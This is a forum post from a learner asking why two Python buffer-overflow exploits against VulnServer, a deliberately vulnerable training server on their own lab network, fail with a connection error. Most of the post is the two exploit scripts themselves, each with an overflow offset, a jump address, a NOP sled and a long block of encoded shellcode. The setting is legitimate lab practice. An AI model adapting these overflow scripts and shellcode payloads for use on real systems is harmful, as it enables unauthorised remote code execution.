POST ID: 12crpuw / POST TITLE: Stuck at gaining shell access to VulnServer. Need Help!
====================================================================================================
 I am stuck at gaining access to VulnServer. I have tried not one but different tutorials on how to do that. Initially, I followed TCM as I am learning his EHC. Then I tried using John Hammond's guide on how to exploit buffer overflow to get shell access but that is of no use for me, too.

The issue I am facing is whenever I try to run the exploit, while I have netcap or metasploit running in another tab, the Vulnserver gives an error:\\

>**Received a client connection from** ***192.168.100.5:56094***  
**Waiting for client connections...**  
**Recv failed with error: 10054**

Here are the scripts that I have tried running:

John Hammond's:

>`!/usr/bin/env python3`  
`import socket`  
`import struct`  
`all_chars = b"".join([ struct.pack('<B', x) for x in range(1,256) ])`  
`s = socket.socket()`  
`s.connect( ("`  
`192.168.100.5``", 9999) )`  
`total_length = 2984`  
`offset = 2003`  
`new_eip = struct.pack("<I", 0x62501203)`  
`nop_sled = b"\x90" * 32`  
`buf = b""`  
`buf += b"\xbe\xc5\xdb\x15\x6e\xd9\xe8\xd9\x74\x24\xf4\x5f"`  
`buf += b"\x29\xc9\xb1\x59\x31\x77\x14\x83\xc7\x04\x03\x77"`  
`buf += b"\x10\x27\x2e\xe9\x86\x28\xd1\x12\x57\x56\xe3\xc0"`  
`buf += b"\xde\x73\x67\x6e\xb2\x4b\xe3\x22\x3f\x20\xa1\xd6"`  
`buf += b"\x30\x81\x0c\xf1\xc5\x9f\xb8\xcc\x26\x6e\x79\x82"`  
`buf += b"\xe5\xf1\x05\xd9\x39\xd1\x34\x12\x4c\x10\x70\xe4"`  
`buf += b"\x3a\xfd\x2c\xa0\x4f\x53\xc1\xc5\x12\x6f\xe0\x09"`  
`buf += b"\x19\xcf\x9a\x2c\xde\xbb\x16\x2e\x0f\xc8\xef\x28"`  
`buf += b"\xff\x45\xb7\x68\xfe\x8a\xcd\xa0\x74\x10\x87\x03"`  
`buf += b"\x8a\xe3\x23\xef\x75\x25\x7a\x2f\xb4\x06\x70\x03"`  
`buf += b"\x36\x5f\xb3\xbb\x4c\xab\xc7\x46\x57\x68\xb5\x9c"`  
`buf += b"\xd2\x6e\x1d\x56\x44\x4a\x9f\xbb\x13\x19\x93\x70"`  
`buf += b"\x57\x45\xb0\x87\xb4\xfe\xcc\x0c\x3b\xd0\x44\x56"`  
`buf += b"\x18\xf4\x0d\x0c\x01\xad\xeb\xe3\x3e\xad\x54\x5b"`  
`buf += b"\x9b\xa6\x77\x8a\x9b\x47\x88\xb3\xc1\xdf\x44\x7e"`  
`buf += b"\xfa\x1f\xc3\x09\x89\x2d\x4c\xa2\x05\x1d\x05\x6c"`  
`buf += b"\xd1\x14\x01\x8f\x0d\x9e\x42\x71\xae\xde\x4b\xb6"`  
`buf += b"\xfa\x8e\xe3\x1f\x83\x45\xf4\xa0\x56\xf3\xfe\x36"`  
`buf += b"\x53\x03\xfd\xc2\x0b\x01\x01\xda\x97\x8c\xe7\x8c"`  
`buf += b"\x77\xde\xb7\x6c\x28\x9e\x67\x05\x22\x11\x57\x35"`  
`buf += b"\x4d\xf8\xf0\xdc\xa2\x54\xa8\x48\x5a\xfd\x22\xe8"`  
`buf += b"\xa3\x28\x4f\x2a\x2f\xd8\xaf\xe5\xd8\xa9\xa3\x12"`  
`buf += b"\xbf\x51\x3c\xe3\x2a\x51\x56\xe7\xfc\x06\xce\xe5"`  
`buf += b"\xd9\x60\x51\x15\x0c\xf3\x96\xe9\xd1\xc5\xed\xdc"`  
`buf += b"\x47\x69\x9a\x20\x88\x69\x5a\x77\xc2\x69\x32\x2f"`  
`buf += b"\xb6\x3a\x27\x30\x63\x2f\xf4\xa5\x8c\x19\xa8\x6e"`  
`buf += b"\xe5\xa7\x97\x59\xaa\x58\xf2\xd9\xad\xa6\x80\xf5"`  
`buf += b"\x15\xce\x7a\x46\xa6\x0e\x11\x46\xf6\x66\xee\x69"`  
`buf += b"\xf9\x46\x0f\xa0\x52\xce\x9a\x25\x10\x6f\x9a\x6f"`  
`buf += b"\xf4\x31\x9b\x9c\x2d\xc2\xe6\xed\xd2\x23\x17\xe4"`  
`buf += b"\xb6\x24\x17\x08\xc9\x19\xc1\x31\xbf\x5c\xd1\x05"`  
`buf += b"\xb0\xeb\x74\x2f\x5b\x13\x2a\x2f\x4e"`  
`shellcode = buf`  
`payload = [`  
`b"TRUN /.:/",`  
`b"A"*offset,`  
`new_eip,`  
`nop_sled,`  
`shellcode,`  
`b"C"*( total_length - offset - len(new_eip) -len(nop_sled) -len(shellcode) )`  
`]`  
`payload = b"".join(payload)`  
`s.send(payload)`  
`s.close()`

TCM:

>`#!/usr/bin/python3`  
`import sys, socket`  
`overflow = (b"\xba\x5a\x2d\x61\xcf\xdb\xdc\xd9\x74\x24\xf4\x5f\x31\xc9"`  
`b"\xb1\x52\x31\x57\x12\x83\xef\xfc\x03\x0d\x23\x83\x3a\x4d"`  
`b"\xd3\xc1\xc5\xad\x24\xa6\x4c\x48\x15\xe6\x2b\x19\x06\xd6"`  
`b"\x38\x4f\xab\x9d\x6d\x7b\x38\xd3\xb9\x8c\x89\x5e\x9c\xa3"`  
`b"\x0a\xf2\xdc\xa2\x88\x09\x31\x04\xb0\xc1\x44\x45\xf5\x3c"`  
`b"\xa4\x17\xae\x4b\x1b\x87\xdb\x06\xa0\x2c\x97\x87\xa0\xd1"`  
`b"\x60\xa9\x81\x44\xfa\xf0\x01\x67\x2f\x89\x0b\x7f\x2c\xb4"`  
`b"\xc2\xf4\x86\x42\xd5\xdc\xd6\xab\x7a\x21\xd7\x59\x82\x66"`  
`b"\xd0\x81\xf1\x9e\x22\x3f\x02\x65\x58\x9b\x87\x7d\xfa\x68"`  
`b"\x3f\x59\xfa\xbd\xa6\x2a\xf0\x0a\xac\x74\x15\x8c\x61\x0f"`  
`b"\x21\x05\x84\xdf\xa3\x5d\xa3\xfb\xe8\x06\xca\x5a\x55\xe8"`  
`b"\xf3\xbc\x36\x55\x56\xb7\xdb\x82\xeb\x9a\xb3\x67\xc6\x24"`  
`b"\x44\xe0\x51\x57\x76\xaf\xc9\xff\x3a\x38\xd4\xf8\x3d\x13"`  
`b"\xa0\x96\xc3\x9c\xd1\xbf\x07\xc8\x81\xd7\xae\x71\x4a\x27"`  
`b"\x4e\xa4\xdd\x77\xe0\x17\x9e\x27\x40\xc8\x76\x2d\x4f\x37"`  
`b"\x66\x4e\x85\x50\x0d\xb5\x4e\x9f\x7a\xd1\x8b\x77\x79\x19"`  
`b"\x85\xdb\xf4\xff\xcf\xf3\x50\xa8\x67\x6d\xf9\x22\x19\x72"`  
`b"\xd7\x4f\x19\xf8\xd4\xb0\xd4\x09\x90\xa2\x81\xf9\xef\x98"`  
`b"\x04\x05\xda\xb4\xcb\x94\x81\x44\x85\x84\x1d\x13\xc2\x7b"`  
`b"\x54\xf1\xfe\x22\xce\xe7\x02\xb2\x29\xa3\xd8\x07\xb7\x2a"`  
`b"\xac\x3c\x93\x3c\x68\xbc\x9f\x68\x24\xeb\x49\xc6\x82\x45"`  
`b"\x38\xb0\x5c\x39\x92\x54\x18\x71\x25\x22\x25\x5c\xd3\xca"`  
`b"\x94\x09\xa2\xf5\x19\xde\x22\x8e\x47\x7e\xcc\x45\xcc\x9e"`  
`b"\x2f\x4f\x39\x37\xf6\x1a\x80\x5a\x09\xf1\xc7\x62\x8a\xf3"`  
`b"\xb7\x90\x92\x76\xbd\xdd\x14\x6b\xcf\x4e\xf1\x8b\x7c\x6e"`  
`b"\xd0")`  
`shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 16 + overflow`  
`try:`  
`s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`  
`s.connect(('`  
`192.168.100.5``',9999))`  
`payload = b"TRUN /.:/" + shellcode`  
`s.send(payload)`  
`s.close()`  
`except:`  
`print ("Error connecting to server")`  
`sys.exit()`

It's been 4 days since I have been trying to troubleshoot what's wrong with the script or the settings and I have hit a dead end.

I am using VirtualBox to run Kali machine on NAT Network and VulnServer is on my windows host machine.

Any help would be appreciated guys.

POST COMMENTS:
====================================================================================================
